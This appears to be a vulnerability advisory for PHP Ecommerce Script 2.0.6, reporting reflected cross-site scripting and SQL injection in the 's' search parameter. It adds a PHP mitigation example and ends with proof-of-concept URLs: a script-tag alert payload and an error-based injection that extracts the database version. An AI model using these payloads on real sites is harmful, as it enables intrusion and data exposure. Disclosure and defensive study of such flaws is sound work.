Vendor: PHP Ecommerce Script
By: Mr Winst0n
CVSS: 8.8 (HIGH)
Cross Site Scripting / SQL Injection
CWE: 79, 89
Product Name: PHP Ecommerce Script
Affected Version From: 2.0.6
Affected Version To: 2.0.6
Patch Exists: NO
Related CWE: N/A
CPE: a:phpscriptsmall:php_ecommerce_script:2.0.6
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Kali Linux, Windows 8.1
2019

PHP Ecommerce Script 2.0.6 – Cross Site Scripting / SQL Injection

An attacker can exploit this vulnerability by sending a malicious payload in the 's' parameter of the URL. For Cross Site Scripting, the payload can be a script tag with an alert function. For SQL Injection, the payload can be a SQL query that extracts the version of the database.

Mitigation:

Input validation should be used to prevent malicious payloads from being sent to the application. Additionally, parameterized queries should be used to prevent SQL Injection.
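
The mitigation above, sketched for a search parameter like 's' as an added example (not the product's code and not part of the original advisory). It pairs input validation and a parameterized query with output encoding, which is what stops the reflected script. The `products` table, the function names and the in-memory SQLite database are assumptions so the example runs offline:

```php
<?php
declare(strict_types=1);

// Constructed in-memory catalogue (assumed schema; requires the pdo_sqlite extension).
function demo_db(): PDO {
    $pdo = new PDO('sqlite::memory:');
    $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $pdo->exec('CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT)');
    $pdo->exec("INSERT INTO products (name) VALUES ('Red shirt'), ('Blue shirt')");
    return $pdo;
}

// Input validation: bound the length and reject control characters.
function validate_search(string $s): ?string {
    $s = trim($s);
    if ($s === '' || strlen($s) > 64 || preg_match('/[\x00-\x1F\x7F]/', $s)) {
        return null;
    }
    return $s;
}

// Parameterized query: the term is bound as data, never concatenated into SQL.
function search_products(PDO $pdo, string $term): array {
    $like = '%' . addcslashes($term, '\\%_') . '%';   // neutralise LIKE wildcards
    $stmt = $pdo->prepare("SELECT id, name FROM products WHERE name LIKE :q ESCAPE '\\'");
    $stmt->execute([':q' => $like]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Output encoding: anything echoed back into HTML is escaped for that context.
function render_results(string $term, array $rows): string {
    $flags = ENT_QUOTES | ENT_SUBSTITUTE;
    $html = '<p>Results for "' . htmlspecialchars($term, $flags, 'UTF-8') . '"</p><ul>';
    foreach ($rows as $row) {
        $html .= '<li>' . htmlspecialchars($row['name'], $flags, 'UTF-8') . '</li>';
    }
    return $html . '</ul>';
}

$pdo = demo_db();
// Constructed inputs: a normal term, an overlong term, and the two PoC values quoted on this page.
$inputs = ['shirt', str_repeat('A', 200), '<scRiPt>alert(1)</ScrIpT>',
           '1 and extractvalue(rand(),concat(0x7e,version()))'];
foreach ($inputs as $raw) {
    $term = validate_search($raw);
    echo $term === null ? "rejected\n" : render_results($term, search_products($pdo, $term)) . "\n";
}
```

Both PoC strings pass the length check, so validation alone does not neutralise them: the bound parameter makes the SQL string an ordinary search term that matches nothing, and the escaping renders the script tag as inert text.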

Exploit-DB raw data:

# Exploit Title: PHP Ecommerce Script 2.0.6 - Cross Site Scripting / SQL Injection
# Exploit Author: Mr Winst0n
# Author E-mail: manamtabeshekan[@]gmail[.]com
# Discovery Date: February 22, 2019
# Vendor Homepage: http://www.phpscriptsmall.com/
# Software Link : https://www.phpscriptsmall.com/product/php-ecommerce-script/
# Tested Version: 2.0.6
# Tested on: Kali linux, Windows 8.1 


# PoC:

# Cross Site Scripting:

# http://localhost/[PATH]/?s=[XSS]
# http://localhost/[PATH]/?s=<scRiPt>alert(1)</ScrIpT>

# SQL Injection:

# http://localhost/[PATH]/?s=[SQL]
# http://localhost/[PATH]/?s=1%20and%20extractvalue(rand(),concat(0x7e,version()))